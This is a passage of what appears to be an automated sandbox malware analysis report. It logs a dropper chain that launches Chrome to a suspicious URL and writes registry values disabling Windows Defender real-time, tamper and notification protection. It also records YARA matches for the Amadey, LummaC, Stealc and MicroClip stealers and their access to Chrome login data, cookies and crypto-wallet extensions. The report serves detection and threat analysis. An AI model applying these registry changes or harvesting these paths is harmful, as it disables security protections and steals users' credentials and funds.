Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103

Source: lIocM276SA.exe, 00000000.00000002.1699375451.00000000004FE000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1725852525.000000000062E000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000002.00000002.1726200814.000000000062E000.00000040.00000001.01000000.00000007.sdmp

Binary or memory string: 8mProgram Manager

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 6_2_0041DD91 cpuid

6_2_0041DD91

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\TypeId.exe	Queries volume information: C:\Users\user\AppData\Roaming\TypeId.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\TypeId.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\lIocM276SA.exe

Code function: 0_2_002ECBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

0_2_002ECBEA

Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disable Windows Defender notifications (registry)

Source: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe

Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1

Disable Windows Defender real time protection (registry)

Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications	Registry value created: DisableNotifications 1

Disables Windows Defender Tamper protection

Source: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe

Registry value created: TamperProtection 0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 6.2.skotes.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.skotes.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.skotes.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.lIocM276SA.exe.2d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1723598147.0000000000401000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1725120776.0000000000401000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1696962631.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected MicroClip

Source: Yara match

File source: Process Memory Space: InstallUtil.exe PID: 2872, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 75.2.0717674af5.exe.c90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000004B.00000002.2734723718.0000000000C91000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 0000004B.00000002.2733720136.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000004B.00000003.2641943936.0000000005120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000081.00000003.2843067219.00000000056B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 0717674af5.exe PID: 6972, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 0717674af5.exe PID: 7408, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Found many strings related to Crypto-Wallets (likely being stolen)

Source: InstallUtil.exe, 0000000A.00000002.3056952575.00000000031B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Electrum
Source: 2090621607.exe, 00000038.00000002.3027024106.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\ElectronCash\walletsJY
Source: InstallUtil.exe, 0000000A.00000002.3056952575.00000000031B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tibnejdfjmmkpcnlpebklmnkoeoihofecuTronLinkvnkbihfbeogaeaoehlefnkodbefgpgknnwMetaMaskxfhbohimaelbohpjbbldcngcnapndodjpyBinance Chain Walletzffnbelfdoeiohenkjibnmadjiehjhajb{Yoroi\|cjelfplplebdjjenllpjcblmjkfcffne}Jaxx Liberty~fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: 2090621607.exe, 00000038.00000002.3027024106.0000000000F38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: 2090621607.exe, 00000038.00000002.3027024106.0000000000F38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: InstallUtil.exe, 0000000A.00000002.3056952575.00000000031B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Exodus Web3
Source: InstallUtil.exe, 0000000A.00000002.3056952575.00000000031B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: 2090621607.exe, 00000038.00000002.3027024106.0000000000F38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsx
Source: pohtent2.exe	String found in binary or memory: set_UseMachineKeyStore
Source: 2090621607.exe, 0000005F.00000002.3059429528.0000000000FE9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
